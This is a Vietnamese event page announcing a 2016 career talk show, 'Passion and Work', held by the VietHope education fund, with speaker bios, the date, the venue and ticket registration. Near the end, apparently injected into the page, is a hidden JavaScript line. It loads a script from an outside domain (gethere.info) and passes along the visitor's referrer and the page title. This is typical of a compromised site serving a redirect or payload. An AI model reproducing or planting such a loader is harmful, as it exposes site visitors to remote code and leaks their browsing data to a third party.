Talk show Đam mê và Công việc

0
35480

Con đường sự nghiệp phía trước bạn đi như thế nào?

Bạn muốn mình thành công trước tuổi 30 chứ?

Talk show “Đam mê và Công việc” sẽ cùng bạn tìm câu trả lời cho chính mình thông qua những chia sẻ cực kỳ thực tế và không thể nào thực tế hơn từ hai khách mời. Họ là ai?

Một là nữ CEO trẻ tuổi, được vinh danh trong Top 30 under 30 thành công trên tạp chí Forbes Vietnam danh tiếng với việc thành lập và dẫn dắt công ty startup là một trong ba công ty dẫn đầu mảng Digital marketing tại Việt Nam hiện nay. Quyết đoán trong lựa chọn nghề nghiệp, trãi nghiệm trong thất bại, bùng cháy trong đam mê và thành công trong thực tại sẽ được chị chia sẻ tại Talk show “Đam mê và Công việc” .

Nếu vị khách mời thứ nhất khơi dậy năng lượng trong bạn với phong cách sôi động, đầy máu lửa thì với vị khách mời thứ hai với phong cách chính chắn và chuyên nghiệp của một chuyên gia nhân sự cao cấp. Sự nghiệp và đam mê trong bạn?  Hai diễn giả sẽ “song kiếm hợp bích” như thế nào?

Tất cả sẽ đươc bật mí trong sáng chủ nhật tuần này lúc 8h00 ngày 27/03/2016 (Chủ nhật) tại Hội trường I,  trường ĐH KHTN, cơ sở 227 Nguyễn Văn Cừ, Q.5, TP.HCM


Do không gian hội trường giới hạn, 150 vé tham dự talk show sẽ được dành tặng cho 150 bạn sinh viên có nội dung đăng ký sớm và quan tâm nhất đến chủ đề này. Hãy nhanh tay đăng ký tham dự talk show tại đây . Chúng tôi sẽ gởi email thông báo đến các bạn sinh viên được chọn tham dự.

———————————————–

Chương trình do Quỹ giáo dục VietHope khởi sướng với và tổ chức mỗi quý một Talk show, đây là Talk show thứ 2, nhằm phát triển tư duy, kỹ năng cho các bạn trẻ từng lãnh học bổng VietHope và mở rộng cho các bạn sinh viên, các bạn trẻ khác.

——————————————————-
Diễn giả:
1. Chị Thi Anh Đào, CEO Emerald. Chị là một nữ CEO trẻ tuổi, được vinh danh trong Top 30 under 30 thành công trên tạp chí Forbes Vietnam danh tiếng với việc gầy dựng một công ty startup là một trong 3 công ty dẫn đầu mảng Digital marketing hiện nay. Những trãi nghiệm lựa chọn ngành nghề, những thất bại, những đam mê rồi thành công sẽ được chia sẻ hết mình trong Talk show.
2. Chị Lê Thị Thanh Vân, Giám đốc nhân sự của công ty MediGroup. Chị từng trãi qua nhiều vị trí trong ngành nhân sự, từng trãi qua các vị trí giám đốc nhân sự ở ở Piza Hut…. Kinh nghiệm và trãi nghiệm của chị sẽ giúp ích cho các định hướng nghề nghiệp của nhiều bạn trẻ.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

CHIA SẺ